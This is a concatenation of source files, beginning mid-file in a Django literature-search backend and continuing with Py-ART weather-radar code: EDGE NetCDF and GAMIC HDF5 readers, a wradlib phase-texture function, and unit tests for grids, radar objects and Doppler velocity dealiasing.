literature[index]['sources'] = [{'link': link, 'name': name} for (link, name) in zip(sources, websites)]
return literature, self.data_count()
def is_first_request(self):
if cache.has_key('kw') and cache.get('kw') == self.kw:
return False
else:
cache.set('kw', self.kw)
return True
@staticmethod
def handle_kw(kw, top=10):
s1 = []
allow_pos = ['g', 'gb', 'gbc', 'gc', 'gg', 'gi', 'gm', 'gp', 'n', 'nb', 'nba', 'nbc', 'nbp', 'nf', 'ng', 'nh',
'nhd', 'nhm', 'ni', 'nic', 'nis', 'nit', 'nl', 'nm', 'nmc', 'nn', 'nnd', 'nnt', 'nr', 'nr1', 'nr2',
'nrf', 'nrj', 'ns', 'nsf', 'nt', 'ntc', 'ntcb', 'ntcf', 'ntch', 'nth', 'nto', 'nts', 'ntu', 'nx',
'nz']
stop_words = stopwords.words('chinese')
IndexTokenizer = JClass('com.hankcs.hanlp.tokenizer.IndexTokenizer')
for term in IndexTokenizer.segment(kw):
word, pos = term.word, term.nature
if word not in stop_words and pos.__str__() in allow_pos:
s1.append(word)
return ' '.join(s1)
@staticmethod
def data_count():
return Content.objects.all().count()
if __name__ == '__main__':
now = time.time()
run('่ฎก็ฎๆบ', ['wp'])
print(time.time() - now)
```
#### File: LiteratureRetrieval/backend/views.py
```python
import json
from django.http import HttpResponse
from django.db.models import F
from .crawler.run import Worker
from .models import *
def search(request):
keywords = request.GET.get('kw', '')
page = request.GET.get('page', 1)
limit = request.GET.get('limit', 10)
source = request.GET.get('sources', '["wp", "wf", "ixs"]')
source = json.loads(source)
worker = Worker(keywords, source)
literature, total = worker.get_data(int(page), limit)
response = json.dumps({'code': 200, 'data': {'total': total, 'items': literature}}, ensure_ascii=False)
return HttpResponse(response)
def get_source_list(request):
sources = Source.objects.annotate(en=F('short_name'), value=F('name')).values('en', 'name', 'url')
response = json.dumps({'code': 200, 'data': list(sources)}, ensure_ascii=False)
return HttpResponse(response)
``` |
{
"source": "josephhardinee/pyart",
"score": 3
} |
#### File: pyart/aux_io/edge_netcdf.py
```python
import datetime
import numpy as np
import netCDF4
from ..config import FileMetadata, get_fillvalue
from ..io.common import make_time_unit_str, _test_arguments
from ..core.radar import Radar
def read_edge_netcdf(filename, **kwargs):
"""
Read a EDGE NetCDF file.
Parameters
----------
filename : str
Name of EDGE NetCDF file to read data from.
Returns
-------
radar : Radar
Radar object.
"""
# test for non empty kwargs
_test_arguments(kwargs)
# create metadata retrieval object
filemetadata = FileMetadata('edge_netcdf')
# Open netCDF4 file
dset = netCDF4.Dataset(filename)
nrays = len(dset.dimensions['Azimuth'])
nbins = len(dset.dimensions['Gate'])
# latitude, longitude and altitude
latitude = filemetadata('latitude')
longitude = filemetadata('longitude')
altitude = filemetadata('altitude')
latitude['data'] = np.array([dset.Latitude], 'float64')
longitude['data'] = np.array([dset.Longitude], 'float64')
altitude['data'] = np.array([dset.Height], 'float64')
# metadata
metadata = filemetadata('metadata')
metadata_mapping = {
'vcp-value': 'vcp',
'radarName-value': 'radar_name',
'ConversionPlugin': 'conversion_software',
}
for netcdf_attr, metadata_key in metadata_mapping.items():
if netcdf_attr in dset.ncattrs():
metadata[metadata_key] = dset.getncattr(netcdf_attr)
# sweep_start_ray_index, sweep_end_ray_index
sweep_start_ray_index = filemetadata('sweep_start_ray_index')
sweep_end_ray_index = filemetadata('sweep_end_ray_index')
sweep_start_ray_index['data'] = np.array([0], dtype='int32')
sweep_end_ray_index['data'] = np.array([nrays-1], dtype='int32')
# sweep number
sweep_number = filemetadata('sweep_number')
sweep_number['data'] = np.array([0], dtype='int32')
# sweep_type
scan_type = 'ppi'
# sweep_mode, fixed_angle
sweep_mode = filemetadata('sweep_mode')
fixed_angle = filemetadata('fixed_angle')
sweep_mode['data'] = np.array(1 * ['azimuth_surveillance'])
fixed_angle['data'] = np.array([dset.Elevation], dtype='float32')
# time
time = filemetadata('time')
start_time = datetime.datetime.utcfromtimestamp(dset.Time)
time['units'] = make_time_unit_str(start_time)
time['data'] = np.zeros((nrays, ), dtype='float64')
# range
_range = filemetadata('range')
step = float(dset.getncattr('MaximumRange-value')) / nbins * 1000.
_range['data'] = (np.arange(nbins, dtype='float32') * step + step / 2)
_range['meters_to_center_of_first_gate'] = step / 2.
_range['meters_between_gates'] = step
# elevation
elevation = filemetadata('elevation')
elevation_angle = dset.Elevation
elevation['data'] = np.ones((nrays, ), dtype='float32') * elevation_angle
# azimuth
azimuth = filemetadata('azimuth')
azimuth['data'] = dset.variables['Azimuth'][:]
# fields
field_name = dset.TypeName
field_data = np.ma.array(dset.variables[field_name][:])
if 'MissingData' in dset.ncattrs():
field_data[field_data == dset.MissingData] = np.ma.masked
if 'RangeFolded' in dset.ncattrs():
field_data[field_data == dset.RangeFolded] = np.ma.masked
fields = {field_name: filemetadata(field_name)}
fields[field_name]['data'] = field_data
fields[field_name]['units'] = dset.variables[field_name].Units
fields[field_name]['_FillValue'] = get_fillvalue()
# instrument_parameters
instrument_parameters = {}
if 'PRF-value' in dset.ncattrs():
dic = filemetadata('prt')
prt = 1. / float(dset.getncattr('PRF-value'))
dic['data'] = np.ones((nrays, ), dtype='float32') * prt
instrument_parameters['prt'] = dic
if 'PulseWidth-value' in dset.ncattrs():
dic = filemetadata('pulse_width')
pulse_width = dset.getncattr('PulseWidth-value') * 1.e-6
dic['data'] = np.ones((nrays, ), dtype='float32') * pulse_width
instrument_parameters['pulse_width'] = dic
if 'NyquistVelocity-value' in dset.ncattrs():
dic = filemetadata('nyquist_velocity')
nyquist_velocity = float(dset.getncattr('NyquistVelocity-value'))
dic['data'] = np.ones((nrays, ), dtype='float32') * nyquist_velocity
instrument_parameters['nyquist_velocity'] = dic
if 'Beamwidth' in dset.variables:
dic = filemetadata('radar_beam_width_h')
dic['data'] = dset.variables['Beamwidth'][:]
instrument_parameters['radar_beam_width_h'] = dic
dset.close()
return Radar(
time, _range, fields, metadata, scan_type,
latitude, longitude, altitude,
sweep_number, sweep_mode, fixed_angle, sweep_start_ray_index,
sweep_end_ray_index,
azimuth, elevation,
instrument_parameters=instrument_parameters)
```
#### File: pyart/aux_io/gamicfile.py
```python
import numpy as np
import h5py
class GAMICFile(object):
"""
A class to read GAMIC files.
Parameters
----------
filename : str
Filename of GAMIC HDF5 file.
Attributes
----------
nsweeps : int
Number of sweeps (or scans) in the file.
rays_per_sweep : array of int32
Number of rays in each sweep.
total_rays : int
Total number of rays in all sweeps.
start_ray, end_ray : array of int32
Index of the first (start) and last (end) ray in each sweep, 0-based.
_hfile : HDF5 file
Open HDF5 file object from which data is read.
_scans : list
Name of the HDF5 group for each scan.
"""
def __init__(self, filename):
""" initialize object. """
self._hfile = h5py.File(filename, 'r')
self.nsweeps = self._hfile['what'].attrs['sets']
self._scans = ['scan%i' % (i) for i in range(self.nsweeps)]
self.rays_per_sweep = self.how_attrs('ray_count', 'int32')
self.total_rays = sum(self.rays_per_sweep)
# starting and ending ray for each sweep
self.start_ray = np.cumsum(np.append([0], self.rays_per_sweep[:-1]))
self.end_ray = np.cumsum(self.rays_per_sweep) - 1
return
def close(self):
""" Close the file. """
self._hfile.close()
# file checks
def is_file_complete(self):
""" True if all scans in file, False otherwise. """
# check than scan0, scan1, ... scan[nsweeps-1] are present
for scan in self._scans:
if scan not in self._hfile:
return False
return True
def is_file_single_scan_type(self):
""" True is all scans are the same scan type, False otherwise. """
scan_type = self._hfile['scan0/what'].attrs['scan_type']
for scan in self._scans:
if self._hfile[scan]['what'].attrs['scan_type'] != scan_type:
return False
return True
# attribute look up
def where_attr(self, attr, dtype):
""" Return an array containing a attribute from the where group. """
return np.array([self._hfile['where'].attrs[attr]], dtype=dtype)
def how_attr(self, attr, dtype):
""" Return an array containing a attribute from the how group. """
return np.array([self._hfile['how'].attrs[attr]], dtype=dtype)
def is_attr_in_group(self, group, attr):
""" True is attribute is present in the group, False otherwise. """
return attr in self._hfile[group].attrs
def raw_group_attr(self, group, attr):
""" Return an attribute from a group with no reformatting. """
return self._hfile[group].attrs[attr]
def raw_scan0_group_attr(self, group, attr):
""" Return an attribute from the scan0 group with no reformatting. """
return self._hfile['/scan0'][group].attrs[attr]
# scan/sweep based attribute lookup
def how_attrs(self, attr, dtype):
""" Return an array of an attribute for each scan's how group. """
return np.array([self._hfile[s]['how'].attrs[attr]
for s in self._scans], dtype=dtype)
def how_ext_attrs(self, attr):
"""
Return a list of an attribute in each scan's how/extended group.
"""
return [float(self._hfile[s]['how']['extended'].attrs[attr])
for s in self._scans]
def what_attrs(self, attr, dtype):
""" Return a list of an attribute for each scan's what group. """
return np.array([self._hfile[s]['what'].attrs[attr]
for s in self._scans], dtype=dtype)
# misc looping
def moment_groups(self):
""" Return a list of groups under scan0 where moments are stored. """
return [k for k in self._hfile['/scan0'] if k.startswith('moment_')]
def moment_names(self, scan0_groups):
""" Return a list of moment names for a list of scan0 groups. """
return[self._hfile['/scan0'][k].attrs['moment'] for k in scan0_groups]
def ray_header(self, field, dtype):
""" Return an array containing a ray_header field for each sweep. """
data = np.empty((self.total_rays, ), dtype=dtype)
for scan, start, end in zip(self._scans, self.start_ray, self.end_ray):
data[start:end+1] = self._hfile[scan]['ray_header'][field]
return data
def moment_data(self, group, dtype):
""" Read in moment data from all sweeps. """
ngates = int(self._hfile['/scan0/how'].attrs['bin_count'])
data = np.ma.zeros((self.total_rays, ngates), dtype=dtype)
data[:] = np.ma.masked # volume data initially all masked
for scan, start, end in zip(self._scans, self.start_ray, self.end_ray):
# read in sweep data if field exists in scan.
if group in self._hfile[scan]:
sweep_data = _get_gamic_sweep_data(self._hfile[scan][group])
data[start:end+1, :sweep_data.shape[1]] = sweep_data[:]
return data
def sweep_expand(self, arr, dtype='float32'):
""" Expand an sweep indexed array to be ray indexed """
return np.repeat(arr, self.rays_per_sweep).astype(dtype)
def _get_gamic_sweep_data(group):
""" Get GAMIC HDF5 sweep data from an HDF5 group. """
dyn_range_min = group.attrs['dyn_range_min']
dyn_range_max = group.attrs['dyn_range_max']
raw_data = group[:]
fmt = group.attrs['format']
if fmt == 'UV16':
# unsigned 16-bit integer data, 0 indicates a masked value
assert raw_data.dtype == np.uint16
scale = (dyn_range_max - dyn_range_min) / 65535.
offset = dyn_range_min
sweep_data = np.ma.masked_array(
raw_data * scale + offset, mask=(raw_data == 0), dtype='float32')
elif fmt == 'UV8':
# unsigned 8-bit integer data, 0 indicates a masked value
assert raw_data.dtype == np.uint8
scale = (dyn_range_max - dyn_range_min) / 255.
offset = dyn_range_min
sweep_data = np.ma.masked_array(
raw_data * scale + offset, mask=(raw_data == 0), dtype='float32')
else:
raise NotImplementedError('GAMIC data format: %s', fmt)
return sweep_data
```
#### File: pyart/bridge/wradlib_bridge.py
```python
import wradlib
import numpy as np
from ..config import get_metadata, get_field_name
def texture_of_complex_phase(radar, phidp_field=None,
phidp_texture_field=None):
"""
Calculate the texture of the differential phase field.
Calculate the texture of the real part of the complex differential
phase field
Parameters
----------
radar : Radar
Radar object from which to .
phidp_field : str, optional
Name of field in radar which contains the differential phase shift.
None will use the default field name in the Py-ART configuration file.
phidp_texture_field : str, optional
Name to use for the differential phase texture field metadata.
None will use the default field name in the Py-ART configuration file.
Returns
-------
texture_field : dict
Field dictionary containing the texture of the real part
of the complex differential phase.
References
----------
<NAME>., <NAME>, and <NAME>,
A fuzzy logic algorithm for the separation of precipitating from
nonprecipitating echoes using polarimetric radar observations,
Journal of Atmospheric and Oceanic Technology 24 (8), 1439-1451
"""
# parse field names
if phidp_field is None:
phidp_field = get_field_name('differential_phase')
if phidp_texture_field is None:
phidp_field = get_field_name('differential_phase')
# Grab the phase data
phidp = radar.fields[phidp_field]['data']
# convert to complex number
complex_phase = np.exp(1j*(phidp*np.pi/180.0))
# calculate texture using wradlib
w_texture_complex = wradlib.dp.texture(
(np.real(complex_phase) + 1.0) * 180)
texture_field = get_metadata(phidp_texture_field)
texture_field['data'] = w_texture_complex
return texture_field
```
#### File: core/tests/test_grid.py
```python
from __future__ import print_function
import numpy as np
import pyart
COMMON_MAP_TO_GRID_ARGS = {
'grid_shape': (3, 9, 10),
'grid_limits': ((-400.0, 400.0), (-900.0, 900.0), (-900, 900)),
'fields': ['reflectivity'],
'roi_func': lambda z, y, x: 30, }
def test_grid_from_radars():
radar = pyart.testing.make_target_radar()
grid = pyart.map.grid_from_radars((radar,), **COMMON_MAP_TO_GRID_ARGS)
with pyart.testing.InTemporaryDirectory():
tmpfile = 'tmp_grid.nc'
grid.write(tmpfile)
grid2 = pyart.io.read_grid(tmpfile)
# check metadata
for k, v in grid.metadata.items():
print("Checking key:", k, "should have value:", v)
print(grid2.metadata)
assert grid2.metadata[k] == v
# check axes
for axes_key in grid.axes.keys():
for k, v in grid.axes[axes_key].items():
print("Checking axes_key:", axes_key, "key:", k)
if k == 'data':
assert np.all(grid.axes[axes_key][k] == v)
else:
assert grid2.axes[axes_key][k] == v
# check fields
for field in grid.fields.keys():
for k, v in grid.fields[field].items():
print("Checking field:", field, "key:", k)
if k == 'data':
assert np.all(grid.fields[field][k] == v)
else:
assert grid2.fields[field][k] == v
```
#### File: core/tests/test_radar.py
```python
import sys
# we need a class which excepts str for writing in Python 2 and 3
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
import inspect
import numpy as np
from numpy.testing import assert_raises
import pyart
def test_rays_per_sweep_attribute():
radar = pyart.testing.make_target_radar()
rays_per_sweep = radar.rays_per_sweep
assert isinstance(rays_per_sweep, dict)
assert rays_per_sweep['data'].shape == (1, )
assert rays_per_sweep['data'][0] == 360
def test_iterators():
radar = pyart.testing.make_empty_ppi_radar(30, 20, 5)
radar.fields['reflectivity'] = {
'data': np.zeros((100, 30), dtype=np.float32)}
starts = [0, 20, 40, 60, 80]
ends = [19, 39, 59, 79, 99]
starts_ends = [(s, e) for s, e in zip(starts, ends)]
assert inspect.isgenerator(radar.iter_start())
assert [s for s in radar.iter_start()] == starts
assert inspect.isgenerator(radar.iter_end())
assert [s for s in radar.iter_end()] == ends
assert inspect.isgenerator(radar.iter_start_end())
assert [s for s in radar.iter_start_end()] == starts_ends
assert inspect.isgenerator(radar.iter_slice())
for s, start, end in zip(radar.iter_slice(), starts, ends):
assert s.start == start
assert s.stop == end + 1
assert s.step is None
assert inspect.isgenerator(radar.iter_field('reflectivity'))
for d in radar.iter_field('reflectivity'):
assert d.shape == (20, 30)
assert d.dtype == np.float32
assert_raises(KeyError, radar.iter_field, 'foobar')
assert inspect.isgenerator(radar.iter_azimuth())
for d in radar.iter_azimuth():
assert d.shape == (20, )
assert inspect.isgenerator(radar.iter_elevation())
for d in radar.iter_elevation():
assert d.shape == (20, )
def test_get_methods():
radar = pyart.testing.make_empty_ppi_radar(30, 20, 5)
radar.fields['reflectivity'] = {
'data': np.zeros((100, 30), dtype=np.float32)}
assert radar.get_start(0) == 0
assert radar.get_start(1) == 20
assert_raises(IndexError, radar.get_start, -1)
assert_raises(IndexError, radar.get_start, 20)
assert radar.get_end(0) == 19
assert radar.get_end(1) == 39
assert_raises(IndexError, radar.get_end, -1)
assert_raises(IndexError, radar.get_end, 20)
assert radar.get_start_end(0) == (0, 19)
assert radar.get_start_end(1) == (20, 39)
assert_raises(IndexError, radar.get_start_end, -1)
assert_raises(IndexError, radar.get_start_end, 20)
assert radar.get_slice(0) == slice(0, 20)
assert radar.get_slice(1) == slice(20, 40)
assert_raises(IndexError, radar.get_slice, -1)
assert_raises(IndexError, radar.get_slice, 20)
data = radar.get_field(0, 'reflectivity')
assert data.shape == (20, 30)
assert data.dtype == np.float32
data = radar.get_field(1, 'reflectivity')
assert data.shape == (20, 30)
assert data.dtype == np.float32
assert_raises(KeyError, radar.get_field, 0, 'foobar')
assert_raises(IndexError, radar.get_field, -1, 'reflectivity')
assert_raises(IndexError, radar.get_field, 20, 'reflectivity')
assert radar.get_azimuth(0).shape == (20, )
assert_raises(IndexError, radar.get_azimuth, -1)
assert_raises(IndexError, radar.get_azimuth, 20)
assert radar.get_elevation(0).shape == (20, )
assert_raises(IndexError, radar.get_elevation, -1)
assert_raises(IndexError, radar.get_elevation, 20)
assert_raises(LookupError, radar.get_nyquist_vel, 0)
radar.instrument_parameters = {
'nyquist_velocity': {'data': np.ones((100,))}
}
assert round(radar.get_nyquist_vel(0)) == 1
assert_raises(IndexError, radar.get_nyquist_vel, -1)
radar.instrument_parameters['nyquist_velocity']['data'][0] = 2
assert_raises(Exception, radar.get_nyquist_vel, 0)
def test_extract_sweeps():
radar = pyart.testing.make_empty_ppi_radar(100, 360, 3)
radar.fields['reflectivity'] = {'data': np.zeros((1080, 100))}
radar.fields['velocity'] = {'data': np.zeros((1080, 100))}
eradar = radar.extract_sweeps([0, 2])
# extracted radar should have 720 rays, 2 sweeps, 100 gates
assert eradar.time['data'].shape == (720, )
assert eradar.range['data'].shape == (100, )
assert eradar.metadata['instrument_name'] == 'fake_radar'
assert eradar.scan_type == 'ppi'
assert eradar.latitude['data'].shape == (1, )
assert eradar.longitude['data'].shape == (1, )
assert eradar.altitude['data'].shape == (1, )
assert eradar.altitude_agl is None
assert eradar.sweep_number['data'].shape == (2, )
assert eradar.sweep_mode['data'].shape == (2, )
assert eradar.fixed_angle['data'].shape == (2, )
assert eradar.sweep_start_ray_index['data'].shape == (2, )
assert eradar.sweep_end_ray_index['data'].shape == (2, )
assert eradar.target_scan_rate is None
assert eradar.azimuth['data'].shape == (720, )
assert eradar.elevation['data'].shape == (720, )
assert eradar.scan_rate is None
assert eradar.antenna_transition is None
assert eradar.instrument_parameters is None
assert eradar.radar_calibration is None
assert eradar.ngates == 100
assert eradar.nrays == 720
assert eradar.nsweeps == 2
assert eradar.fields['reflectivity']['data'].shape == (720, 100)
assert eradar.fields['velocity']['data'].shape == (720, 100)
def test_extract_sweeps_extra():
radar = pyart.testing.make_empty_ppi_radar(10, 36, 3)
radar.instrument_parameters = {
'prt': {'data': np.zeros((108, ))},
'prt_mode': {'data': np.array(['fixed'] * 3)},
'radar_antenna_gain_h': {'data': np.array(0)},
}
radar.radar_calibration = {
'r_calib_index': {'data': np.zeros((108, ))},
'r_calib_time': {'data': np.zeros((8, ))}
}
eradar = radar.extract_sweeps([0, 2])
instr = eradar.instrument_parameters
assert instr['prt']['data'].shape == (72, )
assert instr['prt_mode']['data'].shape == (2, )
assert instr['radar_antenna_gain_h']['data'].shape == ()
calib = eradar.radar_calibration
assert calib['r_calib_index']['data'].shape == (72, )
assert calib['r_calib_time']['data'].shape == (8, )
def test_extract_sweeps_errors():
radar = pyart.testing.make_empty_ppi_radar(10, 36, 2)
assert_raises(ValueError, radar.extract_sweeps, [0, 2])
assert_raises(ValueError, radar.extract_sweeps, [-1, 1])
def test_radar_creation():
radar = pyart.testing.make_target_radar()
assert isinstance(radar, pyart.core.Radar)
def test_add_field():
radar = pyart.testing.make_target_radar()
dic = {'data': np.zeros((360, 50)), 'standard_name': 'test'}
radar.add_field('test', dic)
assert 'test' in radar.fields
assert 'data' in radar.fields['test']
assert radar.fields['test']['standard_name'] == 'test'
def test_add_field_errors():
radar = pyart.testing.make_target_radar()
assert_raises(ValueError, radar.add_field, 'reflectivity', {})
dic = {'dat': np.zeros((360, 50)), 'standard_name': 'test'}
assert_raises(KeyError, radar.add_field, 'test', dic)
dic = {'data': np.zeros((360, 49)), 'standard_name': 'test'}
assert_raises(ValueError, radar.add_field, 'test', dic)
def test_add_field_like():
radar = pyart.testing.make_target_radar()
data = np.zeros((360, 50))
radar.add_field_like('reflectivity', 'test', data)
assert 'test' in radar.fields
assert 'data' in radar.fields['test']
assert radar.fields['test']['units'] == 'dBZ'
def test_add_field_like_bug():
# tests for bug where adding a field over-writes 'like' field
# data/metadata.
radar = pyart.testing.make_target_radar()
data = np.ones((360, 50))
radar.add_field_like('reflectivity', 'test', data)
radar.fields['test']['units'] = 'fake'
# check field added
assert radar.fields['test']['units'] == 'fake'
assert radar.fields['test']['data'][0, 0] == 1
# check original field
assert radar.fields['reflectivity']['units'] == 'dBZ'
assert radar.fields['reflectivity']['data'][0, 0] == 0
def test_add_field_like_errors():
radar = pyart.testing.make_target_radar()
assert_raises(ValueError, radar.add_field_like, 'foo', 'bar', [])
def test_info_levels():
for level in ['standard', 's', 'compact', 'c', 'full', 'f']:
yield check_info, level
def test_info_nonstandard():
# build a non-standard radar object for testing all paths in info
radar = pyart.testing.make_target_radar()
radar.fields['reflectivity']['data'] = [1, 2, 3, 4]
radar.instrument_parameters = {'foobar': {'data': [1, 2], 'bar': 'foo'}}
radar.radar_calibration = {'foobar': {'data': [1, 2], 'bar': 'foo'}}
check_info('standard', radar)
def check_info(level, radar=None):
out = StringIO()
get_info(level, out, radar)
# don't check the output, just that something was printed.
assert len(out.getvalue()) != 0
def get_info(level='standard', out=sys.stdout, radar=None):
if radar is None:
radar = pyart.testing.make_target_radar()
radar.info(level, out)
def test_info_errors():
assert_raises(ValueError, check_info, 'foo')
def test_is_vpt():
radar = pyart.testing.make_empty_ppi_radar(10, 36, 3)
assert not pyart.core.is_vpt(radar)
pyart.core.to_vpt(radar)
assert pyart.core.is_vpt(radar)
def test_to_vpt():
# single scan
radar = pyart.testing.make_empty_ppi_radar(10, 36, 3)
radar.instrument_parameters = {
'prt_mode': {'data': np.array(['fixed'] * 3)}
}
pyart.core.to_vpt(radar)
assert pyart.core.is_vpt(radar)
assert radar.nsweeps == 1
assert radar.azimuth['data'][10] == 0.0
assert radar.elevation['data'][0] == 90.0
assert len(radar.instrument_parameters['prt_mode']['data']) == 1
# multiple scans
radar = pyart.testing.make_empty_ppi_radar(10, 36, 3)
radar.instrument_parameters = {
'prt_mode': {'data': np.array(['fixed'] * 3)}
}
pyart.core.to_vpt(radar, False)
assert pyart.core.is_vpt(radar)
assert radar.nsweeps == 108
assert radar.azimuth['data'][10] == 10.0
assert radar.elevation['data'][0] == 90.0
assert len(radar.instrument_parameters['prt_mode']['data']) == 108
```
#### File: correct/tests/test_unwrap.py
```python
from __future__ import print_function
import pyart
import numpy as np
from numpy.testing import assert_allclose
from numpy.testing import assert_raises
REF_DATA = [0.5, 1.5, 2.5, 3.5, 4.5, 5.5, 6.5, 7.5, 8.5, 9.5, 10.5, 11.5,
12.5, 13.5, 12.5, 11.5, 10.5, 9.5, 8.5, 7.5, 6.5, 5.5, 4.5, 3.5,
2.5, 1.5, 0.5]
def test_dealias_unwrap_phase_ray():
radar, dealias_vel = perform_dealias('ray')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_sweep():
radar, dealias_vel = perform_dealias('sweep')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_volume():
radar, dealias_vel = perform_dealias('volume')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_no_gatefilter():
radar, dealias_vel = perform_dealias('sweep', gatefilter=False)
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_explicit_gatefilter():
radar = pyart.testing.make_velocity_aliased_radar()
gf = pyart.correct.GateFilter(radar)
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
dealias_vel = pyart.correct.dealias_unwrap_phase(radar, gatefilter=gf)
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_masked_field_sweep():
radar = pyart.testing.make_velocity_aliased_radar()
vdata = radar.fields['velocity']['data']
radar.fields['velocity']['data'] = np.ma.masked_array(vdata)
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
radar.fields['velocity']['data'][180, 25] = np.ma.masked
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit='volume')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
assert np.ma.is_masked(dealias_vel['data'][180, 25])
assert not np.ma.is_masked(dealias_vel['data'][180, 24])
def test_dealias_unwrap_phase_masked_field_volume():
radar = pyart.testing.make_velocity_aliased_radar()
vdata = radar.fields['velocity']['data']
radar.fields['velocity']['data'] = np.ma.masked_array(vdata)
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
radar.fields['velocity']['data'][180, 25] = np.ma.masked
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit='volume')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
assert np.ma.is_masked(dealias_vel['data'][180, 25])
assert not np.ma.is_masked(dealias_vel['data'][180, 24])
def test_dealias_unwrap_phase_masked_field_ray():
radar = pyart.testing.make_velocity_aliased_radar()
vdata = radar.fields['velocity']['data']
radar.fields['velocity']['data'] = np.ma.masked_array(vdata)
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
radar.fields['velocity']['data'][180, 25] = np.ma.masked
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit='ray')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
assert np.ma.is_masked(dealias_vel['data'][180, 25])
assert not np.ma.is_masked(dealias_vel['data'][180, 24])
def test_dealias_unwrap_phase_rhi_sweep():
radar = pyart.testing.make_velocity_aliased_rhi_radar()
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
dealias_vel = pyart.correct.dealias_unwrap_phase(radar)
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_rhi_volume():
radar = pyart.testing.make_velocity_aliased_rhi_radar()
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit='volume')
assert_allclose(dealias_vel['data'][13, :27], REF_DATA)
assert np.ma.is_masked(dealias_vel['data'][13]) is False
def test_dealias_unwrap_phase_raises():
# invalid unwrap_unit
radar = pyart.testing.make_velocity_aliased_radar()
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar,
unwrap_unit='fuzz')
# no explicit nyquist
radar = pyart.testing.make_velocity_aliased_radar()
radar.instrument_parameters = None
assert_raises(LookupError, pyart.correct.dealias_unwrap_phase, radar)
# non-sequential
radar = pyart.testing.make_velocity_aliased_radar()
radar.azimuth['data'][10] = 190.
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar)
# non-aligned sweeps
radar = pyart.testing.make_empty_ppi_radar(1, 10, 2)
radar.fields['velocity'] = {'data': np.zeros((20, 1))}
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar,
nyquist_vel=10, unwrap_unit='volume')
# non-cubic radar
radar = pyart.testing.make_empty_ppi_radar(1, 10, 2)
radar.fields['velocity'] = {'data': np.zeros((20, 1))}
radar.azimuth['data'][-10:] = range(10)
radar.sweep_end_ray_index['data'][-1] = 18
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar,
nyquist_vel=10, unwrap_unit='volume')
# invalid scan type
radar = pyart.testing.make_velocity_aliased_radar()
radar.scan_type = 'fuzz'
assert_raises(ValueError, pyart.correct.dealias_unwrap_phase, radar)
def perform_dealias(unwrap_unit='sweep', **kwargs):
""" Perform velocity dealiasing on reference data. """
radar = pyart.testing.make_velocity_aliased_radar()
# speckling that will not be not be dealiased.
radar.fields['velocity']['data'][13, -4:] = [-7.5, 8.5, 0, 0]
dealias_vel = pyart.correct.dealias_unwrap_phase(
radar, unwrap_unit=unwrap_unit, **kwargs)
return radar, dealias_vel
if __name__ == "__main__":
radar, dealias_vel = perform_dealias()
radar.fields['dealiased_velocity'] = dealias_vel
# print out results
print("ray 13 velocitites before dealias:")
print(radar.fields['velocity']['data'][13])
print("ray 13 velocities after dealias:")
print(radar.fields['dealiased_velocity']['data'][13])
# create plot
import matplotlib.pyplot as plt
fig = plt.figure(figsize=[5, 10])
ax1 = fig.add_subplot(2, 1, 1)
ax2 = fig.add_subplot(2, 1, 2)
rd = pyart.graph.RadarDisplay(radar)
rd.plot_ppi('velocity', 0, ax=ax1, colorbar_flag=False,
title='', vmin=-10, vmax=10)
rd.plot_ppi('dealiased_velocity', 0, ax=ax2, colorbar_flag=False,
title='', vmin=-10, vmax=20)
fig.savefig('dealias_plot.png')
```
#### File: pyart/correct/unwrap.py
```python
from __future__ import print_function
import numpy as np
from ..config import get_metadata
from ._common_dealias import _parse_fields, _parse_gatefilter
from ._common_dealias import _parse_rays_wrap_around, _parse_nyquist_vel
from ._unwrap_1d import unwrap_1d
from ._unwrap_2d import unwrap_2d
from ._unwrap_3d import unwrap_3d
def dealias_unwrap_phase(
radar, unwrap_unit='sweep', nyquist_vel=None,
check_nyquist_uniform=True, gatefilter=False,
rays_wrap_around=None, keep_original=False, vel_field=None,
corr_vel_field=None, skip_checks=False, **kwargs):
"""
Dealias Doppler velocities using multi-dimensional phase unwrapping.
Parameters
----------
radar : Radar
Radar object containing Doppler velocities to dealias.
unwrap_unit : {'ray', 'sweep', 'volume'}, optional
Unit to unwrap independently. 'ray' will unwrap each ray
individually, 'sweep' each sweep, and 'volume' will unwrap the entire
volume in a single pass. 'sweep', the default, often gives superior
results when the lower sweeps of the radar volume are contaminated by
clutter. 'ray' does not use the gatefilter parameter and rays where
gates ared masked will result in poor dealiasing for that ray.
nyquist_velocity : array like or float, optional
Nyquist velocity in unit identical to those stored in the radar's
velocity field, either for each sweep or a single value which will be
used for all sweeps. None will attempt to determine this value from
